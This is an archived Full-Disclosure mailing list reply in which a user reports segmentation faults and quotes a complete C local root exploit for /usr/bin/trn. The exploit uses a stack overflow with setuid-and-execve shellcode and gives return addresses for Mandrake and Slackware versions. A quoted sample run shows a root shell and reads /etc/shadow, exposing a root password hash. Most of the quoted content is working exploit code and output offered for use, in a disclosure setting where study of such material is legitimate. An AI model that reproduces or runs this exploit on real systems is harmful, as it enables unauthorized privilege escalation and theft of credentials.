Network Security: Detailed info on Re: [Full-Disclosure] /usr/bin/trn local root exploit

Subject:	Re: [Full-Disclosure] /usr/bin/trn local root exploit
Date:	Wed, 26 Jan 2005 07:05:27 -0500

I just tested this on Slackware 10 and I get nothing but Segementation
Faults. I see that you have the RET value filled in, but how am I to
calculate what to use for the BOO? You use 142 and 128 in the example.

On Wed, Jan 26, 2005 at 08:27:28AM +0000, Z z a g o r R wrote:

/*
/usr/bin/trn local root exploit
By ZzagorR - http://www.rootbinbash.com
*/
/*
sh-2.05b$ ./trn
 usage   : ./trn ret buf
 example : ./trn 0xbfffff64
 [+] mandrake   9.2  = 0xbfffff96
 [+] slackware 10.0.0= 0xbfffff98
 [+] slackware  9.1.0= 0xbfffff84
sh-2.05b$
sh-2.05b$ ./trn 0xbfffff84 128
 [BOO  %] 128
 [RET  %] bfffff84
sh-2.05b#
sh-2.05b# id
 uid=0(root) gid=98(nobody) groups=98(nobody)
sh-2.05b# cat /etc/shadow
 root:$1$N88/N.aP$dBWcFHiYCXXNb77Y5LPNK1:12705:0:::::
TEST :
MANDRAKE 9.2
SLACKWARE 10.0.0
SLACKWARE 9.1.0
http://www.rootbinbas.com/d0kum4n/trn-test.txt
BOO:
$trn `perl -e 'print "A" x 120'`
$trn `perl -e 'print "A" x 124'`
$trn `perl -e 'print "A" x 128'`
 Segmentation fault
BOO=128
*/

#include <stdio.h>
#include <string.h>
#define NEREDE "/usr/bin/trn"

char caylarbeles[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\x31\xc0\x50\x68\x2f\x2f\x73\x68"
"\x68\x2f\x62\x69\x6e\x89\xe3\x50"
"\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

int main(int argc, char *argv[]){
int bizim;
char bufe[1000];
char *tayfasi;

if (argc < 3) {
 printf ("{           trn l0c4l r00t 3xpl01t          }\n");
 printf ("{  By ZzagorR - http://www.rootbinbash.com  }\n");
 printf ("{  usage   : %s ret buf                  }\n",argv[0]);
 printf ("{  example : %s 0xbfffff99 142           }\n",argv[0]);
 printf ("{  mandrake   9.2   = 0xbfffff96            }\n");
 printf ("{  slackware 10.0.0 = 0xbfffff98            }\n");
 printf ("{  slackware  9.1.0 = 0xbfffff84            }\n");
 exit(1);
}else{
 unsigned long RET=strtoul(argv[1], NULL, 16);
 int BOO = atoi(argv[2]);
  printf ("[BOO  %] %i\n",BOO);
  printf ("[RET  %] %x\n",RET);
 tayfasi = bufe;
 memset(bufe, 0x41,256-strlen(caylarbeles));
 sprintf(bufe+256-strlen(caylarbeles), "%s", caylarbeles);
 for ( bizim = BOO; bizim <= BOO+4; bizim+= 4 )
  *(long*)(tayfasi+bizim) = RET;
 execl(NEREDE, NEREDE , bufe, NULL);
}
}

_________________________________________________________________
Yagmura yakalanmamak i?in sadece semsiyenize degil, MSN hava durumuna 
g?venin! http://www.msn.com.tr/havadurumu/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


-- 
 _________________________
|                         |
|   http://datakill.us    |   
| irc.datakill.us #dkchat |
|_________________________|
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

<Prev in Thread]	Current Thread	[Next in Thread>
[Full-Disclosure] /usr/bin/trn local root exploit, Z z a g o r R Re: [Full-Disclosure] /usr/bin/trn local root exploit, msh at datakill <= Re: Re: [Full-Disclosure] /usr/bin/trn local root exploit, Honza Vlach Re: [Full-Disclosure] /usr/bin/trn local root exploit, Z z a g o r R Re: [Full-Disclosure] /usr/bin/trn local root exploit, Frank Thyes Re: [Full-Disclosure] /usr/bin/trn local root exploit, ntx0f Re: [Full-Disclosure] /usr/bin/trn local root exploit, Wojciech Pawlikowski

Previous by Date:	[Full-Disclosure] Re: Terminal Server vulnerabilities, larry_seltzer_is_a_fraud
Next by Date:	Re: [Full-Disclosure] /usr/bin/trn local root exploit, Frank Thyes
Previous by Thread:	[Full-Disclosure] /usr/bin/trn local root exploit, Z z a g o r R
Next by Thread:	Re: Re: [Full-Disclosure] /usr/bin/trn local root exploit, Honza Vlach
Indexes:	[Date] [Thread] [Top] [All Lists]